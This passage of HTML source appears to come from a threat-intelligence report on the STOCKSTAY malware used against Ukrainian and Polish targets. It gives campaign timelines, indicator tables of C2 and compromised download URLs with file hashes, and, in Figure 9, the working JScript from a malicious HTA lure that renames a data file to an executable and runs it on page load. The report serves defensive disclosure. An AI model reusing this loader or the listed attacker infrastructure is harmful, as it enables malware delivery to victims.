&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p style="text-align: center;"&gt;&lt;span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"&gt;&lt;span style="vertical-align: baseline;"&gt;Table 10: File indicators&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;div align="left"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;&lt;table&gt;&lt;colgroup&gt;&lt;col /&gt;&lt;col /&gt;&lt;/colgroup&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Indicator&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Description&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;https://circoloesteri.elezioni.idnet.it/admin-election/riepilogo.php&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Italian language lure relating to voting on matters related to the Italian Ministry of Foreign Affairs.&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;wss://wool-basalt-clock.glitch.me/ws&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY WebSocket C2&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p style="text-align: center;"&gt;&lt;span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"&gt;&lt;span style="vertical-align: baseline;"&gt;Table 11: Network indicators&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;March 18 – April 3, 2025: Ukraine&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;On April 2, 2025, GTIG identified a compromised email account sending a phishing email containing a message purporting to originate from a Ukrainian university, relating to the testing of a new distance learning environment. The threat actor attached a malicious Remote Desktop Protocol (RDP) file to the email, which upon opening resulted in a connection being established between the victim and an open RDP port (3389) hosted on the actor-registered domain chosen to imitate the same academic institution. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Once the victim connected to the actor's infrastructure, GTIG observed the actor deploying STOCKSTAY.MARKETMAKER to the client. STOCKSTAY.MARKETMAKER was configured to download a ZIP containing STOCKSTAY from a legitimate but compromised website belonging to the State Regulatory Service of Ukraine. In contrast to the majority of earlier observations, the configuration file observed during this operation was protected with a hard-coded password. This appears to correspond with this particular operation’s focus on initial access to a victim’s environment via spear-phishing, through which the specific domain or host name may not be known to the threat actor, and thus cannot be used for environmental keying. GTIG was able to identify the malware using the WebSocket C2 URL &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;wss://weatherdataai.theworkpc.com/ws&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;According to the metadata associated with the ZIP archive downloaded by STOCKSTAY.MARKETMAKER, the core STOCKSTAY components used during this operation were last modified between March 18 – 26, with the configuration file last being modified on March &lt;span style="vertical-align: baseline;"&gt;31&lt;/span&gt;.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;div align="left"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;&lt;table&gt;&lt;colgroup&gt;&lt;col /&gt;&lt;col /&gt;&lt;col /&gt;&lt;/colgroup&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Filename&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Description&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;SHA-256&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;MicrosoftUpdateOneDrive.exe&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY.MARKETMAKER Downloader&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;da8a96bc74e265f945f1cc6992c6dc0f9ea36ed1991f7b8d312db79d9bf78c40&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;docs.zip&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;ZIP archive containing STOCKSTAY components&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;9fe944147c15a87963b06baf6473288d64c23655a0ba9369c35566272d8efc73&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;SMEditor.exe&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY.STOCKTRADER backdoor&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;e1d16fb635060d23e889b0617d77f0cf06d00cc19b43a2c8b5ac53ac027ac722&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;SMNet.exe&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY.STOCKBROKER tunneler&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;dfd5cb91d06b9649d4cab500343af80ad1144a9e46641cc406f43dd169003c22&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;StockMarketView.exe&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY.STOCKMARKET orchestrator&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;2af7b513c05e76d7da5f75bb0a223c894a706c99ef2c2ddfe4eae542f95a08e0&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;fonts&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY configuration file&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;40a3b969d81ef1ef35dd9ebcc6774e060b1b8949d3d74f38ca6b7d789c95cdb3&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p style="text-align: center;"&gt;&lt;span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"&gt;&lt;span style="vertical-align: baseline;"&gt;Table 12: File indicators&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;div align="left"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;&lt;table&gt;&lt;colgroup&gt;&lt;col /&gt;&lt;col /&gt;&lt;/colgroup&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Indicator&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Description&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;https://www.drs.gov.ua/wp-content/themes/twentytwentyfive/docs.zip&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Compromised State Regulatory Service of Ukraine infrastructure serving ZIP archive containing STOCKSTAY components&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;wss://weatherdataai.theworkpc.com/ws&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY WebSocket C2&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p style="text-align: center;"&gt;&lt;span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"&gt;&lt;span style="vertical-align: baseline;"&gt;Table 13: Network indicators&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;May 14, 2025: Poland&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;GTIG identified two samples of STOCKSTAY.STOCKBROKER being uploaded to VirusTotal on May &lt;/span&gt;14, 2025 from Poland. &lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The first sample, named “ClientMNGR2.exe”, matched previously observed versions, however the second sample, named “GR3.exe”, was heavily obfuscated using large quantities of junk code, and a previously unknown string obfuscation mechanism. GTIG tracks this obfuscation mechanism as K1MORPHER, and we have since observed its inclusion in all core STOCKSTAY components, and within select samples of KAZUAR; increasing our confidence that STOCKSTAY exists within the same development ecosystem as other malware leveraged by Turla.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;div align="left"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;&lt;table&gt;&lt;colgroup&gt;&lt;col /&gt;&lt;col /&gt;&lt;col /&gt;&lt;/colgroup&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Filename&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Description&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;SHA-256&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;ClientMNGR2.exe&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY.STOCKBROKER tunneler obfuscated with K1MORPHER&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;d3fd32f915c239872c9e7ed9408b1f36dfcef03aa68f9a396d05c437667cdb43&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;GR3.exe&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY.STOCKBROKER tunneler obfuscated with K1MORPHER&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;98ce3c6e4dd05887ea619f2bbfeb2e2c2805ed07e85e119b79b828b7ef8be397&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p style="text-align: center;"&gt;&lt;span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"&gt;&lt;span style="vertical-align: baseline;"&gt;Table 14: File indicators&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;May 28 – August 8, 2025: Ukraine &lt;/span&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;— &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;Deployment via Malicious HTA&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;On August 8, 2025, GTIG identified a RAR archive, “calculator.rar”, being submitted to VirusTotal. The archive had been hosted on compromised infrastructure belonging to a Ukrainian IT company since at least July 22, 2025. The archive contained a malicious HTA file named “Калькулятор грошового забезпечення військовослужбовців 2025.hta” (translation: "Military personnel cash benefit calculator 2025.hta"). The HTA was designed to execute a variant of the STOCKSTAY.MARKETMAKER downloader, which was also included in the archive, using the code shown in Figure 9.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="Lure HTML page displayed by Калькулятор грошового забезпечення військовослужбовців 2025.hta" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/stockstay-fig8.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Figure 8: Lure HTML page displayed by Калькулятор грошового забезпечення військовослужбовців 2025.hta&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;pre class="language-plain"&gt;&lt;code&gt;&amp;lt;script language="JScript"&amp;gt;
  function renameAndRunFile() {
    try {
      var oldName = "calculator_2025_files\\styles.dat";
      var newName = "calculator_2025_files\\styles.dat.exe";

      var fso = new ActiveXObject("Scripting.FileSystemObject");

      if (fso.FileExists(oldName)) {
        if (fso.FileExists(newName)) {
          fso.DeleteFile(newName);
        }
        fso.MoveFile(oldName, newName);

        var shell = new ActiveXObject("WScript.Shell");
        shell.Run('"' + newName + '"', 1, false);
      } else {
      }

    } catch (e) {
    }
  }

window.onload = function() {
  renameAndRunFile();
};
&amp;lt;/script&amp;gt;&lt;/code&gt;&lt;/pre&gt;
&lt;p style="text-align: center;"&gt;&lt;span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"&gt;&lt;span style="vertical-align: baseline;"&gt;Figure 9: JavaScript code contained in Калькулятор грошового забезпечення військовослужбовців 2025.hta&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The STOCKSTAY.MARKETMAKER variant retrieved a ZIP archive, “EditorToolsPdf.zip”, containing the core STOCKSTAY components from a second compromised server located in Ukraine, this time hosting the archive within a compromised WordPress instance. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Analysis of the modification timestamps within the military calculator lure archive show that this operation dated as far back as May &lt;span style="vertical-align: baseline;"&gt;28,&lt;/span&gt; 2025, when the majority of the contents of the “calculator_2025_files” folder were last modified. The STOCKSTAY.MARKETMAKER executable was last modified on June 5, 2025, and the malicious HTA file was modified on June 10, 2025. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Similar examination of the STOCKSTAY archive shows the configuration file being modified on June 4, 2025, while the archive itself was last modified on the compromised server on June 5, 2025. This series of events shows that the complete STOCKSTAY ZIP archive was staged on the compromised infrastructure while modifications were being made to the initial phishing lures.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;GTIG has been able to confirm via a trusted third party that the original compromise of the Ukrainian server used to host the STOCKSTAY archive occurred on or before May &lt;span style="vertical-align: baseline;"&gt;13,&lt;/span&gt; 2025.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;div align="left"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;&lt;table&gt;&lt;colgroup&gt;&lt;col /&gt;&lt;col /&gt;&lt;col /&gt;&lt;/colgroup&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Filename&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Description&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;SHA-256&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;calculator.rar&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;RAR archive containing STOCKSTAY components&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;6da0b4c1a5d0d3fb6e6a2990a82ba51db1f68a3bba818baa46526a29731e2342&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;Калькулятор грошового забезпечення військовослужбовців 2025.hta&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;HTA lure &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;(translated filename: “Military personnel cash benefit calculator 2025.hta”)&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;0d6b083208097d5b3e189891338540f6c64faaaaf268b0bb0b085dd53d5857b4&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;styles.dat.exe&lt;/code&gt;&lt;/p&gt;
